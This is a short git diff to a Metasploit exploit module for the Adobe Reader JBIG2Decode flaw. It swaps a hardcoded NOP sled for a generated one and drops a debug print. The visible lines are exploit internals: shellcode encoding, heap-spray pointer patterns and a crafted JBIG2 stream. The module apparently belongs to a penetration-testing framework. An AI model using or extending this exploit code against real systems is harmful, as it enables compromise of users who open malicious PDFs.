diff --git a/modules/exploits/windows/fileformat/adobe_jbig2decode.rb b/modules/exploits/windows/fileformat/adobe_jbig2decode.rb index 413e98695b..ff34c2739f 100644 --- a/modules/exploits/windows/fileformat/adobe_jbig2decode.rb +++ b/modules/exploits/windows/fileformat/adobe_jbig2decode.rb @@ -63,8 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote # Encode the shellcode. shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - #nops = Rex::Text.to_unescape(make_nops(4)) - nops = "%u9090%u9090" + nops = Rex::Text.to_unescape(make_nops(4)) pointerPattern1 = Rex::Text.to_unescape("\x00\x00\x00\x00\x90\x8a\x01\x07") pointerPattern2 = Rex::Text.to_unescape("\x90\x8a\x01\x07\x00\x00\x00\x00") @@ -135,7 +134,6 @@ class Metasploit3 < Msf::Exploit::Remote jbig2stream = Array.new (0..1).each { |i| jbig2stream[i] = eaxptr + "\x40\x00" + modifier[i] + eaxp20ptr - #print_status "jbig2stream[#{i}]: #{jbig2stream[i]}" } # Create the pdf